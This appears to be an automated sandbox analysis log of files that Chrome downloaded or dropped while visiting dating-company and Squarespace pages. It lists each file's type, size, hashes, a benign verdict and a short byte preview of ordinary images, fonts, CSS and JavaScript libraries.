                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs...........~... .IDATx..;.e.r....\........9cHC.A.3.La... C....5. .......+}.}..rd..c.q..H......<...Z.!#"r..].]...A...{=r.#......?......C.........._......;.G"4.w.d... |.1_w8...S.y.s....~.;.[.....13 .j.....{...j....>".oy7?............n.T..........o.k......X.|~.."..{.}m.}....PE.?....>....1..]."<l...m...h.hoq.Y.;.....'......w..w.....=......./...........\../......C.u...y...O.=....n.{xD........B.k..6..*.u...j\........W..{~..=?\.....................................N.!VE...s..p.... n`...m..c.d.8 8..m.7.x..?.qe\.9...~......;.]....?..w.._....;~........'~.......O....s.w......wzk9..@...ofX.3{a=...5Zk.....l..;.G.M`8\.@...0pg....?.....q.a?....~|.W..?....}../~.-...?..~...........|.p......;...qy..w...7.x|..~y`S........6T.7G......W..u..h.#..fD8.PwL...c.X^......<...~..._.............Q...)?..i....E[E.3...Fv.^..O.y.........................|...pa.<py..xy`k!..m.5..h.R..t.j.!..B..8..T4~..inf.a...88..q}....O.........
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):416
                                                                                                                                                                                                                                                                                Entropy (8bit):6.986452293849356
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:6v/7sAt0+dDqmh8BROIrWkTMB91rGhI+gBdpUf+7:hadDR4ROIakTW9xGeLB7
                                                                                                                                                                                                                                                                                MD5:B45B49DF5EED87C4C880C5880C8B4F1F
                                                                                                                                                                                                                                                                                SHA1:DFBFD5582621B8A960D648F830F200B451613B28
                                                                                                                                                                                                                                                                                SHA-256:5CEF37BD9F7FBFCD869B22E9E35ABF92378ABDD09E3F715530F74A62E564A68D
                                                                                                                                                                                                                                                                                SHA-512:3B7DF07EAAFAFA5A6A64D6293639CE378A557E4F9DC5790D7C820EE8AB82943ABCD2988E5B13F9C0EDA19990F218FA64F58DAB6C38BB93F2619034837216E6DB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....D......QPLTE...........W..W..i..z..y.."..?..q.."..i..a........N..B..*..7..x.....................tRNS.?....?......L....IDAT8...r. .@.E....!.....A.......pK.!.sPy.T.........;.;..C...tF.?...}.:D..c3".4....q[...(..0..B....1..L...h.6!.....)...D.].hC.[2..c...1......3...B.r...EF......M.,=..."..6"....T.g....2p.....H.R..$.]NaZ.F.....a...i.r..D./.....V.#.......x.../.j.Sa....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4103
                                                                                                                                                                                                                                                                                Entropy (8bit):5.573234278412048
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:/2XjHtorvlP5rJ02moGkUtS6NYVbxb0wCp9s2ALwZxa:eJoTlPHfmookbjCpi4Zs
                                                                                                                                                                                                                                                                                MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                                                                                                                                SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                                                                                                                                SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                                                                                                                                SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ct.pinterest.com/static/ct/token_create.js
                                                                                                                                                                                                                                                                                Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4366
                                                                                                                                                                                                                                                                                Entropy (8bit):5.042559319059115
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:0UFeeMVDvvkKl32w+dRnYfHx1nmQLTcn1rJNXnLvS+IjgnecZL:0Z3x+bnYfHo1LvSbjM
                                                                                                                                                                                                                                                                                MD5:121B0DC39B53B3621B3F6B5B3F8E676A
                                                                                                                                                                                                                                                                                SHA1:FF93FF11C238F668935A0BE6A0E34993537BC7C2
                                                                                                                                                                                                                                                                                SHA-256:AA83D7043CEAE6ABBB780E47AB4A71BAE70C09B46207AB0CA4D5211ED060B631
                                                                                                                                                                                                                                                                                SHA-512:69DA10F53D5BEE74EAE67D095497F23F5E2995A382037ABADC5E87C9EB9F2C069C9DC3DAEED57406D511C98C595A0A9A22528AD8EE431A46B578AF39364F79A4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/frontend-builder-global-functions.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:(function($){..window.tm_pb_smooth_scroll = function( $target, $top_section, speed, easing ) {...var $window_width = $( window ).width();....if ( $( 'body' ).hasClass( 'tm_fixed_nav' ) && $window_width > 980 ) {....$menu_offset = $( '#top-header' ).outerHeight() + $( '#main-header' ).outerHeight() - 1;...} else {....$menu_offset = -1;...}....if ( $ ('#wpadminbar').length && $window_width > 600 ) {....$menu_offset += $( '#wpadminbar' ).outerHeight();...}....//fix sidenav scroll to top...if ( $top_section ) {....$scroll_position = 0;...} else {....$scroll_position = $target.offset().top - $menu_offset;...}....// set swing (animate's scrollTop default) as default value...if( typeof easing === 'undefined' ){....easing = 'swing';...}....$( 'html, body' ).animate( { scrollTop : $scroll_position }, speed, easing );..}...window.tm_fix_video_wmode = function( video_wrapper ) {...$( video_wrapper ).each( function() {....if ( $(this).find( 'iframe' ).length ) {.....var $this_el = $(this).find( '
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), CFF, length 27952, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):27952
                                                                                                                                                                                                                                                                                Entropy (8bit):7.98969904011821
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:dUT7m72UAz50KtqqzqwFUN100qsgeCBbW9xc:2m6v2KtmaUN+0pcbMxc
                                                                                                                                                                                                                                                                                MD5:6B10042B43C71FCAF60D66AC77C81E58
                                                                                                                                                                                                                                                                                SHA1:E6CAC7CBC0E28B1EAC28779DE963D07FC0F6238F
                                                                                                                                                                                                                                                                                SHA-256:2DE1A5E47F98C4A87B6466EF7015EA3C03EED2426EE9D64CDF7FAB323700AF7D
                                                                                                                                                                                                                                                                                SHA-512:2B93B1355660F379B691BFF4E7C3DB6FB005648B47B48C6EC2F2060221A1E3CFEA924B211AC9E56AF45F79F863A39EDE9F343145D0FFDBF9921178E52CEF7BD2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://use.typekit.net/af/8ac9a7/00000000000000007735adcc/30/l?subset_id=2&fvd=i7&v=3
                                                                                                                                                                                                                                                                                Preview:wOF2OTTO..m0..........l............................??DYNA.j..<?GDYN.Y...$.`..N.6.$..L....D. .....P......y...}.E5..@UU=%.ym..../....._....!......=.{1.R.{(.K;..).O...mfJ.M..~~l...9.%.F../x!..D........f...fzT..i.].L.r.s.....<...[.u...E5.8.(.#....!.....Q..&.W1.b@1#`$..Q0....c..........3p.>s...S.C......_.F,.j0(.<A.A.....Z}#s.....y.y...Ti..xM ......l.. .....5..m.......L.$.;s.D.{..3..X..TL..).8...$y...]....|Ci.9.f....?....:......T.p*(M..BLr.......!...o.B2C....8?.<.k.i..DWt.d.5...?.R..D(..0LgH.....ZrX9....\....XnIw.......S.......#|f..+...... ....L...z...uf.........GB.tZ;........B|.A.xXbD8.{atP.*..t`8.S..D(.9..W.J...e.t.Y..B....JaL..mW.?<..!?..3.&..$...9.......o......63... $.ah.dV....g&......E...D.9....6;.^.;;#a.u..bU..p...81.M..r;6.3}..@.:-....:...R%.^tY....`..A.=xB .e....n8.....egg%../../H.K.d.....Y.+W.Z.....{.X.{.}V._.........,1..+..g...Z{c....x.....)..V....u.+....`VvR./..........x.......A..*.>8..m.y......F...N.^.....y...X.EX.%X.ux...W...3sa...fk.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):60097
                                                                                                                                                                                                                                                                                Entropy (8bit):4.778939932401444
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:+l3gtehXCCVPZ/9q1uBefkQzNzreGPPclDEKPHjk8St8MJxTKIWfpgKW+/gS63J:GgmCCV61uBKkQ5SMclgBJxWfpzgSGJ
                                                                                                                                                                                                                                                                                MD5:D7563413488AC6C7B3EAFE99CE6C2776
                                                                                                                                                                                                                                                                                SHA1:4089C66CAF76A95D38F93B9AFCB269831BAC4DAF
                                                                                                                                                                                                                                                                                SHA-256:E54CD327E23323988ED35EE85AA270C15BC78BB6355E691F4622E2EDC1CB7637
                                                                                                                                                                                                                                                                                SHA-512:5919594170709E1DD544FC1A47F6911B9D4C6A58480293603B5078EC05E9041FAD8A2474A37FA419217A61F84D5F23D8E2666404C31FF576BC3C3620787088CD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/linearicons.css?ver=6.5.3
                                                                                                                                                                                                                                                                                Preview:@font-face {...font-family: 'Linearicon';...src: url('../fonts/linearicons.ttf') format('truetype');...font-weight: normal;...font-style: normal;..}...linearicon {...font-family: 'Linearicon';...speak: none;...font-style: normal;...font-weight: normal;...font-variant: normal;...text-transform: none;...line-height: 1;....../* Enable Ligatures ================ */...-webkit-font-feature-settings: "liga";...-moz-font-feature-settings: "liga=1";...-moz-font-feature-settings: "liga";...-ms-font-feature-settings: "liga" 1;...-o-font-feature-settings: "liga";...font-feature-settings: "liga";...../* Better Font Rendering =========== */...-webkit-font-smoothing: antialiased;...-moz-osx-font-smoothing: grayscale;..}.....tm_font_icon .linearicon {...line-height: 1.4em;..}...tm_font_icon .linearicon:before {...font-family: 'Linearicon';..}.....linearicon-home:before {...content: "\e600";..}...linearicon-home2:before {...content: "\e601";..}...linearicon-home3:before {...content: "\e602";..}...linea
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32050), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):66750
                                                                                                                                                                                                                                                                                Entropy (8bit):5.242545461142616
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:zEjMUkR2nC7xXyywDK2IgpnGdxg0B0FaQhDg8r7FQ4+tt3N3HyTI5dDV6rTRqkUs:Ijg7xynK2nTDFaY28xU5EwsPT7
                                                                                                                                                                                                                                                                                MD5:39143C2C1078B0D3082DDB949438E3D6
                                                                                                                                                                                                                                                                                SHA1:EBEE0B90FD9F5ECB74587BAADF156F05F09A836A
                                                                                                                                                                                                                                                                                SHA-256:B8192C69D0603C4B4EF821885797A3E6350EE9689364610D39CC96C9FB81E2C8
                                                                                                                                                                                                                                                                                SHA-512:3023261251F96FED60D879907A9DE428147F7B122C638A83ED2733BC7F5A52EEEFC1B37F12B8F459F51B18C3326199E035CBA2C7E7D27FC471D4490A9FFE9470
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/**.. * Swiper 3.3.0.. * Most modern mobile touch slider and framework with hardware accelerated transitions.. * .. * http://www.idangero.us/swiper/.. * .. * Copyright 2016, Vladimir Kharlampidi.. * The iDangero.us.. * http://www.idangero.us/.. * .. * Licensed under MIT.. * .. * Released on: January 10, 2016.. */..!function(){"use strict";function e(e){e.fn.swiper=function(a){var s;return e(this).each(function(){var e=new t(this,a);s||(s=e)}),s}}var a,t=function(e,s){function r(e){return Math.floor(e)}function i(){y.autoplayTimeoutId=setTimeout(function(){y.params.loop?(y.fixLoop(),y._slideNext(),y.emit("onAutoplay",y)):y.isEnd?s.autoplayStopOnLast?y.stopAutoplay():(y._slideTo(0),y.emit("onAutoplay",y)):(y._slideNext(),y.emit("onAutoplay",y))},y.params.autoplay)}function n(e,t){var s=a(e.target);if(!s.is(t))if("string"==typeof t)s=s.parents(t);else if(t.nodeType){var r;return s.parents().each(function(e,a){a===t&&(r=t)}),r?t:void 0}if(0!==s.length)return s[0]}function o(e,a){a=a||{};va
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10548)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):222160
                                                                                                                                                                                                                                                                                Entropy (8bit):5.685126239083562
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:z8tY9uOG2W9fDKdsWHx6cPPy9mTq9Wtr8BttXp51rvIGhPnXalZI:z8tY9uOG2UfDKPHxZPPqmTq9Wtr8Btt3
                                                                                                                                                                                                                                                                                MD5:DF0DAE97129676CF253BEE88B923C1AC
                                                                                                                                                                                                                                                                                SHA1:7E8794F0EDE3CDC0DA2F1BD0B77BCD6988E9A24B
                                                                                                                                                                                                                                                                                SHA-256:916D3820A55C7B68DC819FEC94D51B5D9C78F11E02B3219FFB5418CA4A46E4E1
                                                                                                                                                                                                                                                                                SHA-512:335A1F91EADA694BB91FC6358EC0BFA6900E5EF2922042B9C06FFB34100DE54C24B5B84872BFE16A2181B65195DCDAC9EB38B4D5C8D4C6BC893FB3F63A8183AB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://maps-api-ssl.google.com/maps/api/js?v=3&ver=1.3.1&key
                                                                                                                                                                                                                                                                                Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en-US\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=988\u0026hl=en-US\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en-US\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=163\u0026hl=en-US\u0026"]],null,null,null,null,null,null,null,[["https://streetv
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):43313
                                                                                                                                                                                                                                                                                Entropy (8bit):5.286512703394345
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:C4dDr5VbD+4g2BK67FTSI5RryV77ECGCZ8ZfLEYWnU3r1DSMFLtKCB:CgC4VHo8LCG2gYYv1Dl7B
                                                                                                                                                                                                                                                                                MD5:3AB59DB9933DD06BC3EA839CED81CDE3
                                                                                                                                                                                                                                                                                SHA1:04E00C1115825DB6FBCD8516058EABFCE405A07C
                                                                                                                                                                                                                                                                                SHA-256:0C25771B9E45410D45B0241E7CFC4B3A3215C80A106DE805C5F34B408D6A32F0
                                                                                                                                                                                                                                                                                SHA-512:D4A61E03AD13855EBF392B6FC5345C8B00E5C3F2EED8A504ACAA0FBCA12961949CD2AF9E154D623BE6936191AF0837D81EAAD231D5DF139E3B6552859BDBBB14
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"0232e281-a585-4e05-8d99-2fec39bf53fe","MainText":"Privacy Preference Center","MainInfoText":"When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer.","AboutText":"More information","AboutCookiesText":"Your Privacy","ConfirmText":"Allow All","AllowAl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x1875, components 3
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):282042
                                                                                                                                                                                                                                                                                Entropy (8bit):7.976652441104683
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:h/2wtRhKzvFU7lR5J6vSNLLV3yVBEhF2iQ1IjfHrL3WfXsoq:AwtUvFUn6KNXtFQ1SrLB
                                                                                                                                                                                                                                                                                MD5:66CB32986726A68210046204B62BA913
                                                                                                                                                                                                                                                                                SHA1:7A66F8CA11ED75B4A243DA5C1033B575EA0F5EE3
                                                                                                                                                                                                                                                                                SHA-256:E7795F64CAB6F339C2C35FD8E3A65AD41BAFB1381CD731AF363E64950FD33D69
                                                                                                                                                                                                                                                                                SHA-512:5183419C89C0B08ED65974C0EFBA23189351F0E8B9AA23A580610ACA852B7DCC3787AC2DEAF4EDB4B4B1C909D51ADC147A2525B40FC1F06FAAEE943F6FE230AD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/624b503b5d73881124e70a24/1649102938133-NCW97Y3D0XNSB9T4EAPG/image-asset.jpeg?format=1500w
                                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................S....".........................................J.......................!.1..AQ."aq.2...#..3B....$R.4Cb...%r..5S.c.&'Ds..................................6........................!1A.2Q.".3aqR....#...Bb..r.C............?....M.s2...z..:...IO.......a0Zs....0.i 0...KI.eUi..S.0.."y..=...R..t.F0U..;.&.@.pA..D.N.!-.3*0 ...W`.6.fA..E...m.~`....z#...D4..*2G..q$..d.....7..J.m.U.gl.+4.\.|...V)...W..m?Ei.f6'uc....F.l7W.!..xT..L..JF[....n./.#....y.....3.G.~......tO...0.........wq..z.u7.\..S..VT[.S..H`(j..TU;.@9Yw..De_.$..]s.9X....r...$m..u.L.s..0p..n7<........k..GuN......c .....TM$.#\....e......oI).#`}.1.*....'.....+bp.D.s....!.`P..cm.........(.$tI..Rr.fBE...)..|.A...s.0.h.M).....R..)r...2.... ..m..;O~..=...A....$.."$...p..T.r..|..X..`.`...{..Qr......l.@...T].......e],.F.y=.8E.H...*....*....]. ..iT...$*.crN..Vo..R..9H
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):651429
                                                                                                                                                                                                                                                                                Entropy (8bit):5.844228243807767
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:LSfFv/rwwMdW1ycHsVG02XRwgORDiO3brExZ788jHf3jUEcJ+U/xZ52J2EXNMve5:efB/rwVd9cHouXjxN3wl/W2EX8G
                                                                                                                                                                                                                                                                                MD5:5AF41E7B4416873B171E4ACCB4B60B1D
                                                                                                                                                                                                                                                                                SHA1:2C8D91BDEE42AAC24EE4BFB80A59DA955FD99DC3
                                                                                                                                                                                                                                                                                SHA-256:0C0A365C16D896348DF4DE6DA13178A97B72C35CED08BF51C455D2886AD4BB25
                                                                                                                                                                                                                                                                                SHA-512:257607643028E04DF815F2CC33797575B6049EFB3029614E4B1BC3A3A2A101E242B324333AA79E4C632321FCE80C2AD071133F3826AF18631CD262B3DE5E85ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function() {var u1=Object.defineProperty,c1=Object.defineProperties;var l1=Object.getOwnPropertyDescriptors;var ai=Object.getOwnPropertySymbols;var m1=Object.prototype.hasOwnProperty,d1=Object.prototype.propertyIsEnumerable;var on=(m,l)=>(l=Symbol[m])?l:Symbol.for("Symbol."+m);var oi=(m,l,i)=>l in m?u1(m,l,{enumerable:!0,configurable:!0,writable:!0,value:i}):m[l]=i,Ln=(m,l)=>{for(var i in l||(l={}))m1.call(l,i)&&oi(m,i,l[i]);if(ai)for(var i of ai(l))d1.call(l,i)&&oi(m,i,l[i]);return m},ii=(m,l)=>c1(m,l1(l));var Nr=(m,l,i)=>new Promise((s,r)=>{var d=E=>{try{p(i.next(E))}catch(g){r(g)}},f=E=>{try{p(i.throw(E))}catch(g){r(g)}},p=E=>E.done?s(E.value):Promise.resolve(E.value).then(d,f);p((i=i.apply(m,l)).next())}),sn=function(m,l){this[0]=m,this[1]=l},si=(m,l,i)=>{var s=(f,p,E,g)=>{try{var y=i[f](p),b=(p=y.value)instanceof sn,A=y.done;Promise.resolve(b?p[0]:p).then(S=>b?s(f==="return"?f:"next",p[1]?{done:S.done,value:S.value}:S,E,g):E({value:S,done:A})).catch(S=>s("throw",S,E,g))}catch(S){
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (53025)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1559164
                                                                                                                                                                                                                                                                                Entropy (8bit):5.618399136544392
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:xWeqE2xBbnOZUtPgXAM+T1mFbs65JDjW9/4S/92Buw8HY:3tABbSUtPPZKs65JDdS/92B98HY
                                                                                                                                                                                                                                                                                MD5:83897F6AF185E69EDC505156BEDB9342
                                                                                                                                                                                                                                                                                SHA1:C3B475ABCC890617536FCBC3789EF8EFBF0B020D
                                                                                                                                                                                                                                                                                SHA-256:739F273B2B712E9AF2AA517029D2D8D5CF3E5DBEDC14B8B94EE498B2BEA3E47C
                                                                                                                                                                                                                                                                                SHA-512:E82BA00FF67C345995A76DBF5DAAE6931FBB9701FFA80155AD099ECA517C5DCEA03D83F0444813384179E0DB589DEEC0B4347B21D176291ABB1D91EBE7E8B38D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/common-e4650bfe0701012bc38f-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[68592,10054,22125,73946,58271,9201],{141126:(_,u,e)=>{"use strict";var d=e(875832),n=e(569644);Object.defineProperty(u,"__esModule",{value:!0}),u.default=c;var i=v(e(562215)),t=v(e(556628)),o=d(e(579085));function a(h){if(typeof WeakMap!="function")return null;var r=new WeakMap,s=new WeakMap;return(a=function(g){return g?s:r})(h)}function v(h,r){if(!r&&h&&h.__esModule)return h;if(h===null||n(h)!="object"&&typeof h!="function")return{default:h};var s=a(r);if(s&&s.has(h))return s.get(h);var f={__proto__:null},g=Object.defineProperty&&Object.getOwnPropertyDescriptor;for(var m in h)if(m!=="default"&&{}.hasOwnProperty.call(h,m)){var E=g?Object.getOwnPropertyDescriptor(h,m):null;E&&(E.get||E.set)?Object.defineProperty(f,m,E):f[m]=h[m]}return f.default=h,s&&s.set(h,f),f}function c(h,r,s,f,g){var m=t.uid(h._actionsRegistry,"".concat(r,".").concat(s));h._actionsRegistry[m]=1;var E={id:m,namespace:r,name:s},S=function(R){retu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (18426)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):151601
                                                                                                                                                                                                                                                                                Entropy (8bit):5.246168694247747
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:qIOPbLwq/9XFyrl11MoKa304sKYMUW0Vn:xun
                                                                                                                                                                                                                                                                                MD5:5D538F587E66947D2D30452B71ECF6DE
                                                                                                                                                                                                                                                                                SHA1:65C01222F05201293C382B421CFE2ADD4C880A58
                                                                                                                                                                                                                                                                                SHA-256:8624072555F38993B5374E1F72376C0C6A01691B58BC2E537150A6E68A91845F
                                                                                                                                                                                                                                                                                SHA-512:58D0D7E4153354CAC1E757943DB35AF75DF716B0747C3FFCE687FFEE5DA3E1BF3684FE30BD991E77A4537B1F245D881286B8AA261F04FAD2882AF978047B9CE9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://www.spark.net/our-portfolio/
